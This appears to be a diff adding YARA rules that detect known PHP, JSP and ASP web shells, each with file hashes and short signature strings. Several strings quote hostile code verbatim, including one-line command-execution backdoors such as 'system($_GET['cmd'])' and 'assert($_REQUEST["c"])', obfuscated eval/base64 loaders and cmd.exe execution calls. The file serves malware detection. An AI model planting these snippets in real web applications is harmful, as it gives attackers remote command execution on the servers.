+rule webshell_jsp_IXRbE {
+ meta:
+ description = "Web Shell - file IXRbE.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "e26e7e0ebc6e7662e1123452a939e2cd"
+ strings:
+ $s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
+ condition:
+ all of them
+}
+rule webshell_PHP_G5 {
+ meta:
+ description = "Web Shell - file G5.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "95b4a56140a650c74ed2ec36f08d757f"
+ strings:
+ $s3 = "echo \"Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op"
+ condition:
+ all of them
+}
+rule webshell_PHP_r57142 {
+ meta:
+ description = "Web Shell - file r57142.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "0911b6e6b8f4bcb05599b2885a7fe8a8"
+ strings:
+ $s0 = "$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');" fullword
+ condition:
+ all of them
+}
+rule webshell_jsp_tree {
+ meta:
+ description = "Web Shell - file tree.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "bcdf7bbf7bbfa1ffa4f9a21957dbcdfa"
+ strings:
+ $s5 = "$('#tt2').tree('options').url = \"selectChild.action?checki"
+ $s6 = "String basePath = request.getScheme()+\"://\"+request.getServerName()+\":\"+requ"
+ condition:
+ all of them
+}
+rule webshell_C99madShell_v_3_0_smowu {
+ meta:
+ description = "Web Shell - file smowu.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "74e1e7c7a6798f1663efb42882b85bee"
+ strings:
+ $s2 = "<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: Enter ::</b><for"
+ $s8 = "<p><font color=red>Wordpress Not Found! <input type=text id=\"wp_pat\"><input ty"
+ condition:
+ 1 of them
+}
+rule webshell_simple_backdoor {
+ meta:
+ description = "Web Shell - file simple-backdoor.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "f091d1b9274c881f8e41b2f96e6b9936"
+ strings:
+ $s0 = "$cmd = ($_REQUEST['cmd']);" fullword
+ $s1 = "if(isset($_REQUEST['cmd'])){" fullword
+ $s4 = "system($cmd);" fullword
+ condition:
+ 2 of them
+}
+rule webshell_PHP_404 {
+ meta:
+ description = "Web Shell - file 404.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "078c55ac475ab9e028f94f879f548bca"
+ strings:
+ $s4 = "<span>Posix_getpwuid (\"Read\" /etc/passwd)"
+ condition:
+ all of them
+}
+rule webshell_Macker_s_Private_PHPShell {
+ meta:
+ description = "Web Shell - file Macker's Private PHPShell.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "e24cbf0e294da9ac2117dc660d890bb9"
+ strings:
+ $s3 = "echo \"<tr><td class=\\\"silver border\\\"> <strong>Server's PHP Version:&n"
+ $s4 = " <?php echo buildUrl(\"<font color=\\\"navy\\\">["
+ $s7 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
+ condition:
+ all of them
+}
+rule webshell_Antichat_Shell_v1_3_2 {
+ meta:
+ description = "Web Shell - file Antichat Shell v1.3.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "40d0abceba125868be7f3f990f031521"
+ strings:
+ $s3 = "$header='<html><head><title>'.getenv(\"HTTP_HOST\").' - Antichat Shell</title><m"
+ condition:
+ all of them
+}
+rule webshell_Safe_mode_breaker {
+ meta:
+ description = "Web Shell - file Safe mode breaker.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "5bd07ccb1111950a5b47327946bfa194"
+ strings:
+ $s5 = "preg_match(\"/SAFE\\ MODE\\ Restriction\\ in\\ effect\\..*whose\\ uid\\ is("
+ $s6 = "$path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : NULL)."
+ condition:
+ 1 of them
+}
+rule webshell_Sst_Sheller {
+ meta:
+ description = "Web Shell - file Sst-Sheller.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "d93c62a0a042252f7531d8632511ca56"
+ strings:
+ $s2 = "echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'>"
+ $s3 = "<? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)"
+ condition:
+ all of them
+}
+rule webshell_jsp_list {
+ meta:
+ description = "Web Shell - file list.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "1ea290ff4259dcaeb680cec992738eda"
+ strings:
+ $s0 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
+ $s2 = "out.print(\") <A Style='Color: \" + fcolor.toString() + \";' HRef='?file=\" + fn"
+ $s7 = "if(flist[i].canRead() == true) out.print(\"r\" ); else out.print(\"-\");" fullword
+ condition:
+ all of them
+}
+rule webshell_PHPJackal_v1_5 {
+ meta:
+ description = "Web Shell - file PHPJackal v1.5.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "d76dc20a4017191216a0315b7286056f"
+ strings:
+ $s7 = "echo \"<center>${t}MySQL cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><form"
+ $s8 = "echo \"<center>${t}Wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr"
+ condition:
+ all of them
+}
+rule webshell_customize {
+ meta:
+ description = "Web Shell - file customize.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "d55578eccad090f30f5d735b8ec530b1"
+ strings:
+ $s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
+ condition:
+ all of them
+}
+rule webshell_s72_Shell_v1_1_Coding {
+ meta:
+ description = "Web Shell - file s72 Shell v1.1 Coding.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "c2e8346a5515c81797af36e7e4a3828e"
+ strings:
+ $s5 = "<font face=\"Verdana\" style=\"font-size: 8pt\" color=\"#800080\">Buradan Dosya "
+ condition:
+ all of them
+}
+rule webshell_jsp_sys3 {
+ meta:
+ description = "Web Shell - file sys3.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "b3028a854d07674f4d8a9cf2fb6137ec"
+ strings:
+ $s1 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">" fullword
+ $s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+ $s9 = "<%@page contentType=\"text/html;charset=gb2312\"%>" fullword
+ condition:
+ all of them
+}
+rule webshell_jsp_guige02 {
+ meta:
+ description = "Web Shell - file guige02.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "a3b8b2280c56eaab777d633535baf21d"
+ strings:
+ $s0 = "????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff"
+ $s1 = "<%@page contentType=\"text/html; charset=GBK\" import=\"java.io.*;\"%><%!private"
+ condition:
+ all of them
+}
+rule webshell_php_ghost {
+ meta:
+ description = "Web Shell - file ghost.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "38dc8383da0859dca82cf0c943dbf16d"
+ strings:
+ $s1 = "<?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'"
+ $s6 = "//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***"
+ $s7 = "preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(KmU(\"" fullword
+ condition:
+ all of them
+}
+rule webshell_WinX_Shell {
+ meta:
+ description = "Web Shell - file WinX Shell.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "17ab5086aef89d4951fe9b7c7a561dda"
+ strings:
+ $s5 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">Filenam"
+ $s8 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">File: </"
+ condition:
+ all of them
+}
+rule webshell_Crystal_Crystal {
+ meta:
+ description = "Web Shell - file Crystal.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "fdbf54d5bf3264eb1c4bff1fac548879"
+ strings:
+ $s1 = "show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value"
+ $s6 = "\" href=\"?act=tools\"><font color=#CC0000 size=\"3\">Tools</font></a></span></f"
+ condition:
+ all of them
+}
+rule webshell_r57_1_4_0 {
+ meta:
+ description = "Web Shell - file r57.1.4.0.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "574f3303e131242568b0caf3de42f325"
+ strings:
+ $s4 = "@ini_set('error_log',NULL);" fullword
+ $s6 = "$pass='abcdef1234567890abcdef1234567890';" fullword
+ $s7 = "@ini_restore(\"disable_functions\");" fullword
+ $s9 = "@ini_restore(\"safe_mode_exec_dir\");" fullword
+ condition:
+ all of them
+}
+rule webshell_jsp_hsxa1 {
+ meta:
+ description = "Web Shell - file hsxa1.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "5686d5a38c6f5b8c55095af95c2b0244"
+ strings:
+ $s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja"
+ condition:
+ all of them
+}
+rule webshell_asp_ajn {
+ meta:
+ description = "Web Shell - file ajn.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "aaafafc5d286f0bff827a931f6378d04"
+ strings:
+ $s1 = "seal.write \"Set WshShell = CreateObject(\"\"WScript.Shell\"\")\" & vbcrlf" fullword
+ $s6 = "seal.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreateOve"
+ condition:
+ all of them
+}
+rule webshell_php_cmd {
+ meta:
+ description = "Web Shell - file cmd.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "c38ae5ba61fd84f6bbbab98d89d8a346"
+ strings:
+ $s0 = "if($_GET['cmd']) {" fullword
+ $s1 = "// cmd.php = Command Execution" fullword
+ $s7 = " system($_GET['cmd']);" fullword
+ condition:
+ all of them
+}
+rule webshell_asp_list {
+ meta:
+ description = "Web Shell - file list.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "1cfa493a165eb4b43e6d4cc0f2eab575"
+ strings:
+ $s0 = "<INPUT TYPE=\"hidden\" NAME=\"type\" value=\"<%=tipo%>\">" fullword
+ $s4 = "Response.Write(\"<h3>FILE: \" & file & \"</h3>\")" fullword
+ condition:
+ all of them
+}
+rule webshell_PHP_co {
+ meta:
+ description = "Web Shell - file co.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "62199f5ac721a0cb9b28f465a513874c"
+ strings:
+ $s0 = "cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV" fullword
+ $s11 = "6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j" fullword
+ condition:
+ all of them
+}
+rule webshell_PHP_150 {
+ meta:
+ description = "Web Shell - file 150.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "400c4b0bed5c90f048398e1d268ce4dc"
+ strings:
+ $s0 = "HJ3HjqxclkZfp"
+ $s1 = "<? eval(gzinflate(base64_decode('" fullword
+ condition:
+ all of them
+}
+rule webshell_jsp_cmdjsp_2 {
+ meta:
+ description = "Web Shell - file cmdjsp.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "1b5ae3649f03784e2a5073fa4d160c8b"
+ strings:
+ $s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
+ $s4 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
+ condition:
+ all of them
+}
+rule webshell_PHP_c37 {
+ meta:
+ description = "Web Shell - file c37.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "d01144c04e7a46870a8dd823eb2fe5c8"
+ strings:
+ $s3 = "array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),"
+ $s9 = "++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],"
+ condition:
+ all of them
+}
+rule webshell_PHP_b37 {
+ meta:
+ description = "Web Shell - file b37.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "0421445303cfd0ec6bc20b3846e30ff0"
+ strings:
+ $s0 = "xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc"
+ condition:
+ all of them
+}
+rule webshell_php_backdoor {
+ meta:
+ description = "Web Shell - file php-backdoor.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
+ strings:
+ $s1 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))" fullword
+ $s2 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
+ condition:
+ all of them
+}
+rule webshell_asp_dabao {
+ meta:
+ description = "Web Shell - file dabao.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "3919b959e3fa7e86d52c2b0a91588d5d"
+ strings:
+ $s2 = " Echo \"<input type=button name=Submit onclick=\"\"document.location ='\" &"
+ $s8 = " Echo \"document.Frm_Pack.FileName.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-"
+ condition:
+ all of them
+}
+rule webshell_php_2 {
+ meta:
+ description = "Web Shell - file 2.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "267c37c3a285a84f541066fc5b3c1747"
+ strings:
+ $s0 = "<?php assert($_REQUEST[\"c\"]);?> " fullword
+ condition:
+ all of them
+}
+rule webshell_asp_cmdasp {
+ meta:
+ description = "Web Shell - file cmdasp.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "57b51418a799d2d016be546f399c2e9b"
+ strings:
+ $s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+ $s7 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+ condition:
+ all of them
+}
+rule webshell_spjspshell {
+ meta:
+ description = "Web Shell - file spjspshell.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "d39d51154aaad4ba89947c459a729971"
+ strings:
+ $s7 = "Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\\winnt\\system32\\cmd.exe /c type c:"
+ condition:
+ all of them
+}
+rule webshell_jsp_action {
+ meta:
+ description = "Web Shell - file action.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "5a7d931094f5570aaf5b7b3b06c3d8c0"
+ strings:
+ $s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword
+ $s6 = "<%@ page contentType=\"text/html;charset=gb2312\"%>" fullword
+ condition:
+ all of them
+}
+rule webshell_Inderxer {
+ meta:
+ description = "Web Shell - file Inderxer.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "9ea82afb8c7070817d4cdf686abe0300"
+ strings:
+ $s4 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
+ condition:
+ all of them
+}
+rule webshell_asp_Rader {
+ meta:
+ description = "Web Shell - file Rader.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "ad1a362e0a24c4475335e3e891a01731"
+ strings:
+ $s1 = "FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0"
+ $s3 = "m\" target=inf onClick=\"window.open('?action=help','inf','width=450,height=400 "
+ condition:
+ all of them
+}
+rule webshell_c99_madnet_smowu {
+ meta:
+ description = "Web Shell - file smowu.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "3aaa8cad47055ba53190020311b0fb83"
+ strings:
+ $s0 = "//Authentication" fullword
+ $s1 = "$login = \"" fullword
+ $s2 = "eval(gzinflate(base64_decode('"
+ $s4 = "//Pass"
+ $s5 = "$md5_pass = \""
+ $s6 = "//If no pass then hash"
+ condition:
+ all of them
+}
+rule webshell_php_moon {
+ meta:
+ description = "Web Shell - file moon.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "2a2b1b783d3a2fa9a50b1496afa6e356"
+ strings:
+ $s2 = "echo '<option value=\"create function backshell returns string soname"
+ $s3 = "echo \"<input name='p' type='text' size='27' value='\".dirname(_FILE_).\""
+ $s8 = "echo '<option value=\"select cmdshell(\\'net user "
+ condition:
+ 2 of them
+}
+rule webshell_jsp_jdbc {
+ meta:
+ description = "Web Shell - file jdbc.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "23b0e6f91a8f0d93b9c51a2a442119ce"
+ strings:
+ $s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
+ condition:
+ all of them
+}
+rule webshell_minupload {
+ meta:
+ description = "Web Shell - file minupload.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "ec905a1395d176c27f388d202375bdf9"
+ strings:
+ $s0 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\"> " fullword
+ $s9 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859"
+ condition:
+ all of them
+}
+rule webshell_ELMALISEKER_Backd00r {
+ meta:
+ description = "Web Shell - file ELMALISEKER Backd00r.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "3aa403e0a42badb2c23d4a54ef43e2f4"
+ strings:
+ $s0 = "response.write(\"<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio"
+ $s2 = "if FP = \"RefreshFolder\" or request.form(\"cmdOption\")=\"DeleteFolder\" or req"
+ condition:
+ all of them
+}
+rule webshell_PHP_bug_1_ {
+ meta:
+ description = "Web Shell - file bug (1).php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "91c5fae02ab16d51fc5af9354ac2f015"
+ strings:
+ $s0 = "@include($_GET['bug']);" fullword
+ condition:
+ all of them
+}
+rule webshell_caidao_shell_hkmjj {
+ meta:
+ description = "Web Shell - file hkmjj.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "e7b994fe9f878154ca18b7cde91ad2d0"
+ strings:
+ $s6 = "codeds=\"Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" " fullword
+ condition:
+ all of them
+}
+rule webshell_jsp_asd {
+ meta:
+ description = "Web Shell - file asd.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "a042c2ca64176410236fcc97484ec599"
+ strings:
+ $s3 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%>" fullword
+ $s6 = "<input size=\"100\" value=\"<%=application.getRealPath(\"/\") %>\" name=\"url"
+ condition:
+ all of them
+}
+rule webshell_jsp_inback3 {
+ meta:
+ description = "Web Shell - file inback3.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "ea5612492780a26b8aa7e5cedd9b8f4e"
+ strings:
+ $s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
+ condition:
+ all of them
+}
+rule webshell_metaslsoft {
+ meta:
+ description = "Web Shell - file metaslsoft.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "aa328ed1476f4a10c0bcc2dde4461789"
+ strings:
+ $s7 = "$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>LINK</t"
+ condition:
+ all of them
+}
+rule webshell_asp_Ajan {
+ meta:
+ description = "Web Shell - file Ajan.asp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ hash = "b6f468252407efc2318639da22b08af0"
+ strings:
+ $s3 = "entrika.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreate"
+ condition:
+ all of them
+}
+rule webshell_config_myxx_zend {
+ meta:
+ description = "Web Shell - from files config.jsp, myxx.jsp, zend.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "d44df8b1543b837e57cc8f25a0a68d92"
+ hash1 = "e0354099bee243702eb11df8d0e046df"
+ hash2 = "591ca89a25f06cf01e4345f98a22845c"
+ strings:
+ $s3 = ".println(\"<a href=\\\"javascript:alert('You Are In File Now ! Can Not Pack !');"
+ condition:
+ all of them
+}
+rule webshell_browser_201_3_ma_download {
+ meta:
+ description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+ hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+ hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+ hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
+ hash4 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+ strings:
+ $s2 = "<small>jsp File Browser version <%= VERSION_NR%> by <a"
+ $s3 = "else if (fName.endsWith(\".mpg\") || fName.endsWith(\".mpeg\") || fName.endsWith"
+ condition:
+ all of them
+}
+rule webshell_itsec_itsecteam_shell_jHn {
+ meta:
+ description = "Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "8ae9d2b50dc382f0571cd7492f079836"
+ hash1 = "bd6d3b2763c705a01cc2b3f105a25fa4"
+ hash2 = "40c6ecf77253e805ace85f119fe1cebb"
+ strings:
+ $s4 = "echo $head.\"<font face='Tahoma' size='2'>Operating System : \".php_uname().\"<b"
+ $s5 = "echo \"<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'"
+ condition:
+ all of them
+}
+rule webshell_ghost_source_icesword_silic {
+ meta:
+ description = "Web Shell - from files ghost_source.php, icesword.php, silic.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "cbf64a56306c1b5d98898468fc1fdbd8"
+ hash1 = "6e20b41c040efb453d57780025a292ae"
+ hash2 = "437d30c94f8eef92dc2f064de4998695"
+ strings:
+ $s3 = "if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $"
+ $s6 = "if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST["
+ condition:
+ all of them
+}
+rule webshell_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_spy2009_m_ma3_xxx {
+ meta:
+ description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+ hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+ hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+ hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+ hash4 = "8b457934da3821ba58b06a113e0d53d9"
+ hash5 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+ hash6 = "14e9688c86b454ed48171a9d4f48ace8"
+ hash7 = "b330a6c2d49124ef0729539761d6ef0b"
+ hash8 = "d71716df5042880ef84427acee8b121e"
+ hash9 = "341298482cf90febebb8616426080d1d"
+ hash10 = "29aebe333d6332f0ebc2258def94d57e"
+ hash11 = "42654af68e5d4ea217e6ece5389eb302"
+ hash12 = "88fc87e7c58249a398efd5ceae636073"
+ hash13 = "4a812678308475c64132a9b56254edbc"
+ hash14 = "9626eef1a8b9b8d773a3b2af09306a10"
+ hash15 = "344f9073576a066142b2023629539ebd"
+ hash16 = "32dea47d9c13f9000c4c807561341bee"
+ hash17 = "90a5ba0c94199269ba33a58bc6a4ad99"
+ hash18 = "655722eaa6c646437c8ae93daac46ae0"
+ hash19 = "b9744f6876919c46a29ea05b1d95b1c3"
+ hash20 = "9c94637f76e68487fa33f7b0030dd932"
+ hash21 = "6acc82544be056580c3a1caaa4999956"
+ hash22 = "6aa32a6392840e161a018f3907a86968"
+ hash23 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+ hash24 = "3ea688e3439a1f56b16694667938316d"
+ hash25 = "ab77e4d1006259d7cbc15884416ca88c"
+ hash26 = "71097537a91fac6b01f46f66ee2d7749"
+ hash27 = "2434a7a07cb47ce25b41d30bc291cacc"
+ hash28 = "7a4b090619ecce6f7bd838fe5c58554b"
+ strings:
+ $s8 = "\"<form action=\\\"\"+SHELL_NAME+\"?o=upload\\\" method=\\\"POST\\\" enctype="
+ $s9 = "<option value='reg query \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\T"
+ condition:
+ all of them
+}
+rule webshell_2_520_job_ma1_ma4_2 {
+ meta:
+ description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "64a3bf9142b045b9062b204db39d4d57"
+ hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+ hash2 = "56c005690da2558690c4aa305a31ad37"
+ hash3 = "532b93e02cddfbb548ce5938fe2f5559"
+ hash4 = "6e0fa491d620d4af4b67bae9162844ae"
+ hash5 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
+ strings:
+ $s4 = "_url = \"jdbc:microsoft:sqlserver://\" + dbServer + \":\" + dbPort + \";User=\" "
+ $s9 = "result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getR"
+ condition:
+ all of them
+}
+rule webshell_000_403_807_a_c5_config_css_dm_he1p_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_xxx {
+ meta:
+ description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+ hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+ hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+ hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+ hash4 = "8b457934da3821ba58b06a113e0d53d9"
+ hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
+ hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+ hash7 = "14e9688c86b454ed48171a9d4f48ace8"
+ hash8 = "b330a6c2d49124ef0729539761d6ef0b"
+ hash9 = "d71716df5042880ef84427acee8b121e"
+ hash10 = "341298482cf90febebb8616426080d1d"
+ hash11 = "29aebe333d6332f0ebc2258def94d57e"
+ hash12 = "42654af68e5d4ea217e6ece5389eb302"
+ hash13 = "88fc87e7c58249a398efd5ceae636073"
+ hash14 = "4a812678308475c64132a9b56254edbc"
+ hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
+ hash16 = "e0354099bee243702eb11df8d0e046df"
+ hash17 = "344f9073576a066142b2023629539ebd"
+ hash18 = "32dea47d9c13f9000c4c807561341bee"
+ hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
+ hash20 = "655722eaa6c646437c8ae93daac46ae0"
+ hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
+ hash22 = "9c94637f76e68487fa33f7b0030dd932"
+ hash23 = "6acc82544be056580c3a1caaa4999956"
+ hash24 = "6aa32a6392840e161a018f3907a86968"
+ hash25 = "591ca89a25f06cf01e4345f98a22845c"
+ hash26 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+ hash27 = "3ea688e3439a1f56b16694667938316d"
+ hash28 = "ab77e4d1006259d7cbc15884416ca88c"
+ hash29 = "71097537a91fac6b01f46f66ee2d7749"
+ hash30 = "2434a7a07cb47ce25b41d30bc291cacc"
+ hash31 = "7a4b090619ecce6f7bd838fe5c58554b"
+ strings:
+ $s0 = "ports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";" fullword
+ $s1 = "private static class VEditPropertyInvoker extends DefaultInvoker {" fullword
+ condition:
+ all of them
+}
